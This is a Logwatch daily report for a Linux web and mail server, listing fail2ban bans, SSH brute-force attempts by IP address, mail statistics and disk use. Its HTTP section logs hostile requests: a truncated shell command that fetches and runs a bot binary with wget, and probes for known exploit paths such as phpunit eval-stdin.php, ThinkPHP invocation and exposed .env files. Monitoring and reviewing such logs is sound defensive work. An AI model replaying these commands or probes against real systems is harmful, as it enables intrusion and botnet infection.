[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Sonntag, 27 Juni 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Sun Jun 27 04:42:06 2021
        Date Range Processed: yesterday
                              ( 2021-Jun-26 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [189:189]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 Connection attempts using mod_proxy:
    158.51.126.242 -> httpbin.org:443: 2 Time(s)
 
 A total of 9 sites probed the server 
    104.248.230.130
    120.85.114.117
    137.116.115.135
    199.19.224.201
    199.19.225.175
    2.56.59.20
    209.141.49.75
    5.188.210.227
    66.240.205.34
 
 Requests with error response codes
    400 Bad Request
       null: 15 Time(s)
       /: 4 Time(s)
       /aaa9: 2 Time(s)
       /aab9: 2 Time(s)
       httpbin.org:443: 2 Time(s)
       /shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C ... rm;./arm+smoke1: 1 Time(s)
       /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
       \x99g\x89P\xA5\xA9\x13<\xD3\xCF%ET\xF4\xE1 ... 95v\xB0m\xE862F: 1 Time(s)
       http://5.188.210.227/echo.php: 1 Time(s)
       mstshash=Administr: 1 Time(s)
       mstshash=hello: 1 Time(s)
    403 Forbidden
       /resolutionen/wise17/Zwangsexmatrikulation/: 1 Time(s)
    404 Not Found
       /robots.txt: 72 Time(s)
       /protokolle/Ergebnisprotokoll_MV_09.06.2017.pdf: 2 Time(s)
       /sites/default/files/Lehramtstellungnahme.pdf: 2 Time(s)
       /wp-login.php: 2 Time(s)
       /%7C: 1 Time(s)
       //2019/wp-includes/wlwmanifest.xml: 1 Time(s)
       //2020/wp-includes/wlwmanifest.xml: 1 Time(s)
       //blog/wp-includes/wlwmanifest.xml: 1 Time(s)
       //cms/wp-includes/wlwmanifest.xml: 1 Time(s)
       //news/wp-includes/wlwmanifest.xml: 1 Time(s)
       //shop/wp-includes/wlwmanifest.xml: 1 Time(s)
       //site/wp-includes/wlwmanifest.xml: 1 Time(s)
       //sito/wp-includes/wlwmanifest.xml: 1 Time(s)
       //test/wp-includes/wlwmanifest.xml: 1 Time(s)
       //web/wp-includes/wlwmanifest.xml: 1 Time(s)
       //website/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
       //wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
       //xmlrpc.php?rsd: 1 Time(s)
       /admin/fckeditor/editor/filemanager/connec ... rrentFolder=%2F: 1 Time(s)
       /fckeditor/editor/filemanager/connectors/a ... rrentFolder=%2F: 1 Time(s)
       /home/verein: 1 Time(s)
       /js/fckeditor/editor/filemanager/connector ... rrentFolder=%2F: 1 Time(s)
       /neuigkeiten/einladung-mgv-ss2011: 1 Time(s)
       /resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 1 Time(s)
       /sites/default/files/2009_WiSe_M%C3%BCnchen.pdf: 1 Time(s)
       /verein/satzung/%7CSatzung: 1 Time(s)
       /verein/vorstand/%7C: 1 Time(s)
       /xmlrpc.php: 1 Time(s)
       /zapf/reader/%7CTagungsreader: 1 Time(s)
    500 Internal Server Error
       /: 65 Time(s)
       /owa/: 3 Time(s)
       /.env: 2 Time(s)
       /aaa9: 2 Time(s)
       /aab9: 2 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
       /?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
       /Autodiscover/Autodiscover.xml: 1 Time(s)
       /_ignition/execute-solution: 1 Time(s)
       /actuator/health: 1 Time(s)
       /api/jsonws/invoke: 1 Time(s)
       /console/: 1 Time(s)
       /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
       /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
       /mifs/.;/services/LogService: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
       /wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (162.243.233.102): 77 Time(s)
       root (106.37.82.42): 70 Time(s)
       root (110.141.212.12): 70 Time(s)
       root (112.64.33.38): 70 Time(s)
       root (129.211.191.53): 70 Time(s)
       root (139.59.186.178): 70 Time(s)
       root (200.60.92.170): 70 Time(s)
       root (206.189.234.114): 70 Time(s)
       root (218.29.41.249): 70 Time(s)
       root (42.193.183.121): 70 Time(s)
       root (45.231.13.37): 70 Time(s)
       root (97.105.212.218): 70 Time(s)
       root (202.85.222.190): 68 Time(s)
       root (106.13.223.163): 66 Time(s)
       root (23.101.124.74): 66 Time(s)
       root (82.156.53.141): 60 Time(s)
       root (81.68.90.168): 56 Time(s)
       root (1.15.137.210): 50 Time(s)
       root (101.71.3.53): 50 Time(s)
       root (103.18.79.44): 50 Time(s)
       root (118.193.38.5): 50 Time(s)
       root (134.209.93.51): 50 Time(s)
       root (167.71.64.7): 50 Time(s)
       root (206.189.143.15): 50 Time(s)
       root (36.133.212.215): 50 Time(s)
       root (62.28.217.62): 50 Time(s)
       root (184.69.65.90): 49 Time(s)
       root (27.128.173.81): 48 Time(s)
       root (134.122.113.222): 45 Time(s)
       root (139.155.229.38): 45 Time(s)
       root (119.45.153.96): 43 Time(s)
       root (51.159.64.186): 43 Time(s)
       root (115.228.237.35.bc.googleusercontent.com): 42 Time(s)
       root (156.54.109.206): 41 Time(s)
       root (46.101.29.76): 41 Time(s)
       root (119.29.170.202): 40 Time(s)
       root (210.12.168.79): 38 Time(s)
       root (81.69.24.142): 37 Time(s)
       unknown (68.183.115.224): 36 Time(s)
       root (122.51.248.76): 35 Time(s)
       root (42.193.2.199): 35 Time(s)
       root (159.89.194.103): 31 Time(s)
       root (27.50.164.210): 30 Time(s)
       root (40.72.100.214): 30 Time(s)
       root (1.234.58.220): 28 Time(s)
       root (41.32.134.38): 28 Time(s)
       unknown (159.75.203.4): 28 Time(s)
       root (150.109.93.131): 27 Time(s)
       root (mlearning.scs-net.org): 27 Time(s)
       root (111.229.185.154): 26 Time(s)
       root (223.247.33.150): 26 Time(s)
       root (62.189.71.12): 26 Time(s)
       unknown (118.101.194.235): 22 Time(s)
       unknown (162.243.233.102): 22 Time(s)
       root (194.152.206.93): 21 Time(s)
       unknown (124.78.47.83): 20 Time(s)
       unknown (125.77.25.123): 20 Time(s)
       unknown (142.93.61.113): 20 Time(s)
       unknown (177.1.213.19): 20 Time(s)
       unknown (51.15.219.5): 20 Time(s)
       unknown (95.85.43.241): 20 Time(s)
       unknown (ec2-13-125-160-27.ap-northeast-2.compute.amazonaws.com): 20 Time(s)
       root (41.215.138.42): 18 Time(s)
       unknown (81.70.12.135): 18 Time(s)
       unknown (120.53.246.131): 17 Time(s)
       unknown (140.143.189.58): 16 Time(s)
       unknown (204.48.16.247): 16 Time(s)
       unknown (122.51.168.254): 14 Time(s)
       unknown (157.245.227.165): 14 Time(s)
       unknown (106.13.231.16): 13 Time(s)
       unknown (198.23.172.237): 13 Time(s)
       root (106.13.231.16): 11 Time(s)
       root (68.183.115.224): 11 Time(s)
       unknown (71-213-59-62.mnfd.qwest.net): 10 Time(s)
       root (177.1.213.19): 9 Time(s)
       root (122.51.168.254): 8 Time(s)
       root (125.77.25.123): 8 Time(s)
       root (140.143.189.58): 8 Time(s)
       root (142.93.61.113): 8 Time(s)
       root (157.245.227.165): 8 Time(s)
       root (204.48.16.247): 8 Time(s)
       root (118.101.194.235): 6 Time(s)
       root (120.53.246.131): 6 Time(s)
       root (138.68.53.185): 6 Time(s)
       root (209.141.35.200): 6 Time(s)
       root (210.211.116.80): 6 Time(s)
       root (41.226.25.4): 6 Time(s)
       unknown (178.62.237.221): 6 Time(s)
       root (119.29.170.170): 5 Time(s)
       root (ec2-13-125-160-27.ap-northeast-2.compute.amazonaws.com): 5 Time(s)
       unknown (157.230.103.238): 5 Time(s)
       unknown (195.133.40.104): 5 Time(s)
       root (198.23.172.237): 4 Time(s)
       root (95.85.43.241): 4 Time(s)
       unknown (199.195.248.154): 4 Time(s)
       unknown (209.141.35.200): 4 Time(s)
       root (106.35.131.166): 3 Time(s)
       root (124.78.47.83): 3 Time(s)
       root (159.75.203.4): 3 Time(s)
       unknown (116.110.76.66): 3 Time(s)
       unknown (116.110.81.212): 3 Time(s)
       unknown (141.98.10.179): 3 Time(s)
       unknown (171.225.247.182): 3 Time(s)
       unknown (209.141.46.72): 3 Time(s)
       unknown (209.141.53.250): 3 Time(s)
       unknown (209.141.55.110): 3 Time(s)
       unknown (45.135.232.165): 3 Time(s)
       unknown (51.15.197.4): 3 Time(s)
       postgres (106.13.231.16): 2 Time(s)
       postgres (81.70.12.135): 2 Time(s)
       root (116.106.18.141): 2 Time(s)
       root (170.106.82.81): 2 Time(s)
       root (51.15.219.5): 2 Time(s)
       root (81.70.12.135): 2 Time(s)
       temp (68.183.115.224): 2 Time(s)
       unknown (116.106.18.141): 2 Time(s)
       unknown (17.83-213-112.dynamic.clientes.euskaltel.es): 2 Time(s)
       unknown (180.137.41.239): 2 Time(s)
       unknown (205.185.125.109): 2 Time(s)
       unknown (45.146.165.72): 2 Time(s)
       unknown (athedsl-132844.home.otenet.gr): 2 Time(s)
       unknown (i218-44-18-247.s41.a012.ap.plala.or.jp): 2 Time(s)
       unknown (ip-178-200-66-234.hsi07.unitymediagroup.de): 2 Time(s)
       unknown (sub-24ip160.rev.onenet.cw): 2 Time(s)
       backup (157.245.227.165): 1 Time(s)
       mysql (ec2-13-125-160-27.ap-northeast-2.compute.amazonaws.com): 1 Time(s)
       postgres (118.101.194.235): 1 Time(s)
       postgres (124.78.47.83): 1 Time(s)
       postgres (125.77.25.123): 1 Time(s)
       postgres (51.15.219.5): 1 Time(s)
       root (115.159.149.149): 1 Time(s)
       root (118.184.88.21): 1 Time(s)
       root (118.195.161.225): 1 Time(s)
       root (119.28.32.209): 1 Time(s)
       root (140.143.210.92): 1 Time(s)
       root (142.93.63.163): 1 Time(s)
       root (157.230.106.198): 1 Time(s)
       root (171.225.247.182): 1 Time(s)
       root (193.169.254.113): 1 Time(s)
       root (193.169.255.46): 1 Time(s)
       root (211-23-87-106.hinet-ip.hinet.net): 1 Time(s)
       root (51.15.197.4): 1 Time(s)
       root (58.222.107.253): 1 Time(s)
       root (71-213-59-62.mnfd.qwest.net): 1 Time(s)
       root (89.128.127.18): 1 Time(s)
       root (91.219.236.228): 1 Time(s)
       root (ip166.ip-51-195-166.eu): 1 Time(s)
       root (proxmox1-tc2.macrolan.co.za): 1 Time(s)
       temp (95.85.43.241): 1 Time(s)
       unknown (103-231-228-244.bd-networks.com): 1 Time(s)
       unknown (106.35.131.166): 1 Time(s)
       unknown (165.22.25.35): 1 Time(s)
       unknown (176.111.173.246): 1 Time(s)
       unknown (185.46.163.163): 1 Time(s)
       unknown (194.61.26.211): 1 Time(s)
       unknown (45.153.160.136): 1 Time(s)
       unknown (61.157.18.2): 1 Time(s)
       unknown (62.102.148.68): 1 Time(s)
       unknown (62.28.217.62): 1 Time(s)
       unknown (91.187.215.94): 1 Time(s)
       unknown (fixed-187-190-236-88.totalplay.net): 1 Time(s)
       unknown (lisin1011.fvds.ru): 1 Time(s)
       unknown (n49-187-169-84.rdl4.qld.optusnet.com.au): 1 Time(s)
       unknown (tdlearning.org): 1 Time(s)
       unknown (tor-exit-relay-7.anonymizing-proxy.digitalcourage.de): 1 Time(s)
       unknown (u9531.col.agava.net): 1 Time(s)
       uucp (45.146.165.72): 1 Time(s)
       www-data (106.13.231.16): 1 Time(s)
       www-data (95.85.43.241): 1 Time(s)
    Invalid Users:
       Unknown Account: 465 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

        4   Miscellaneous warnings  
 
   18.613K  Bytes accepted                              19,060
   18.613K  Bytes sent via SMTP                         19,060
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
       13   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
       13   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
      663   Connections             
      545   Connections lost (inbound) 
      663   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        5   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Disconnecting after too many authentication failures for user:
    root : 1 Time(s)
 
 Failed logins from:
    1.15.137.210: 50 times
    1.234.58.220: 28 times
    13.125.160.27 (ec2-13-125-160-27.ap-northeast-2.compute.amazonaws.com): 6 times
    23.101.124.74: 66 times
    27.50.164.210: 30 times
    27.128.173.81: 48 times
    35.237.228.115 (115.228.237.35.bc.googleusercontent.com): 42 times
    36.133.212.215: 50 times
    40.72.100.214: 30 times
    41.32.134.38 (host-41.32.134.38.tedata.net): 28 times
    41.215.138.42: 18 times
    41.226.25.4: 6 times
    42.193.2.199: 35 times
    42.193.183.121: 70 times
    45.146.165.72: 1 time
    45.231.13.37: 70 times
    46.101.29.76: 41 times
    51.15.197.4 (4-197-15-51.instances.scw.cloud): 1 time
    51.15.219.5 (5-219-15-51.instances.scw.cloud): 3 times
    51.159.64.186 (51-159-64-186.rev.poneytelecom.eu): 43 times
    51.195.166.166 (ip166.ip-51-195-166.eu): 1 time
    58.222.107.253: 1 time
    62.28.217.62: 50 times
    62.189.71.12: 26 times
    68.183.115.224: 13 times
    71.213.59.62 (71-213-59-62.mnfd.qwest.net): 1 time
    81.68.90.168: 56 times
    81.69.24.142: 37 times
    81.70.12.135: 4 times
    82.156.53.141: 60 times
    89.128.127.18: 1 time
    91.219.236.228 (441061389-dedicated.serverastra.com): 1 time
    95.85.43.241: 6 times
    97.105.212.218: 70 times
    101.71.3.53: 50 times
    103.18.79.44: 50 times
    106.13.223.163: 66 times
    106.13.231.16: 14 times
    106.35.131.166: 3 times
    106.37.82.42 (42.82.37.106.static.bjtelecom.net): 70 times
    110.141.212.12 (cpe-110-141-212-12.static.sa.bigpond.net.au): 70 times
    111.229.185.154: 26 times
    112.64.33.38: 70 times
    115.159.149.149: 1 time
    116.106.18.141 (dynamic-ip-adsl.viettel.vn): 2 times
    118.101.194.235: 7 times
    118.184.88.21: 1 time
    118.193.38.5: 50 times
    118.195.161.225: 1 time
    119.28.32.209: 1 time
    119.29.170.170: 5 times
    119.29.170.202: 40 times
    119.45.153.96: 43 times
    120.53.246.131: 6 times
    122.51.168.254: 8 times
    122.51.248.76: 35 times
    124.78.47.83 (83.47.78.124.broad.xw.sh.dynamic.163data.com.cn): 4 times
    125.77.25.123: 9 times
    129.211.191.53: 70 times
    134.122.113.222: 45 times
    134.209.93.51: 50 times
    138.68.53.185: 6 times
    139.59.186.178: 70 times
    139.155.229.38: 45 times
    140.143.189.58: 8 times
    140.143.210.92: 1 time
    142.93.61.113: 8 times
    142.93.63.163: 1 time
    150.109.93.131: 27 times
    154.70.208.66 (proxmox1-tc2.macrolan.co.za): 1 time
    156.54.109.206: 41 times
    157.230.106.198: 1 time
    157.245.227.165: 9 times
    159.75.203.4: 3 times
    159.89.194.103: 31 times
    162.243.233.102: 77 times
    167.71.64.7: 50 times
    170.106.82.81: 2 times
    171.225.247.182 (dynamic-ip-adsl.viettel.vn): 1 time
    177.1.213.19: 9 times
    184.69.65.90: 49 times
    193.169.254.113: 1 time
    193.169.255.46: 1 time
    194.152.206.93: 21 times
    198.23.172.237 (198-23-172-237-host.colocrossing.com): 4 times
    200.60.92.170: 70 times
    202.85.222.190: 68 times
    204.48.16.247: 8 times
    206.189.143.15: 50 times
    206.189.234.114: 70 times
    209.141.35.200: 6 times
    210.12.168.79: 38 times
    210.211.116.80: 6 times
    211.23.87.106 (211-23-87-106.HINET-IP.hinet.net): 1 time
    213.178.252.30 (mlearning.scs-net.org): 27 times
    218.29.41.249 (hn.kd.ny.adsl): 70 times
    223.247.33.150: 26 times
 
 Illegal users from:
    undef: 292 times
    13.125.160.27 (ec2-13-125-160-27.ap-northeast-2.compute.amazonaws.com): 20 times
    45.135.232.165: 3 times
    45.146.165.72: 2 times
    45.153.160.136: 1 time
    49.187.169.84 (n49-187-169-84.rdl4.qld.optusnet.com.au): 1 time
    51.15.197.4 (4-197-15-51.instances.scw.cloud): 3 times
    51.15.219.5 (5-219-15-51.instances.scw.cloud): 20 times
    61.157.18.2 (2.18.157.61.dial.dy.sc.dynamic.163data.com.cn): 1 time
    62.28.217.62: 1 time
    62.102.148.68: 1 time
    65.49.20.66 (scan-17.shadowserver.org): 1 time
    68.183.115.224: 36 times
    71.213.59.62 (71-213-59-62.mnfd.qwest.net): 10 times
    81.70.12.135: 18 times
    83.213.112.17 (17.83-213-112.dynamic.clientes.euskaltel.es): 2 times
    85.75.94.139 (athedsl-132844.home.otenet.gr): 2 times
    89.108.118.85 (u9531.col.agava.net): 1 time
    91.187.215.94 (host-91.187.215-94.static.intred.it): 1 time
    95.85.43.241: 20 times
    103.231.228.244 (103-231-228-244.bd-networks.com): 1 time
    106.13.231.16: 13 times
    106.35.131.166: 1 time
    116.106.18.141 (dynamic-ip-adsl.viettel.vn): 2 times
    116.110.76.66: 3 times
    116.110.81.212: 3 times
    118.101.194.235: 22 times
    120.53.246.131: 17 times
    122.51.168.254: 14 times
    124.78.47.83 (83.47.78.124.broad.xw.sh.dynamic.163data.com.cn): 20 times
    125.77.25.123: 20 times
    140.143.189.58: 16 times
    141.98.10.179 (er.includeswitche.com): 3 times
    142.93.61.113: 20 times
    157.230.103.238: 5 times
    157.245.227.165: 14 times
    159.75.203.4: 28 times
    162.243.233.102: 22 times
    165.22.25.35: 1 time
    167.99.233.40 (tdlearning.org): 1 time
    171.225.247.182 (dynamic-ip-adsl.viettel.vn): 3 times
    176.111.173.214: 1 time
    176.111.173.246: 1 time
    177.1.213.19: 20 times
    178.62.237.221: 6 times
    178.200.66.234 (ip-178-200-66-234.hsi07.unitymediagroup.de): 2 times
    180.137.41.239: 2 times
    185.46.163.163 (185.46.163.163.ipacct.net): 1 time
    185.104.120.30: 1 time
    185.220.102.253 (tor-exit-relay-7.anonymizing-proxy.digitalcourage.de): 1 time
    187.190.236.88 (fixed-187-190-236-88.totalplay.net): 1 time
    188.120.225.148 (lisin1011.fvds.ru): 1 time
    190.88.24.160 (sub-24ip160.rev.onenet.cw): 2 times
    194.61.26.211: 1 time
    195.133.40.104: 5 times
    198.23.172.237 (198-23-172-237-host.colocrossing.com): 13 times
    199.195.248.154: 4 times
    204.48.16.247: 16 times
    205.185.125.109: 2 times
    209.141.35.200: 4 times
    209.141.46.72 (ms25.cimtk.com): 3 times
    209.141.53.250 (modernsubject.com): 3 times
    209.141.55.110: 3 times
    218.44.18.247 (i218-44-18-247.s41.a012.ap.plala.or.jp): 2 times
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop23974p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)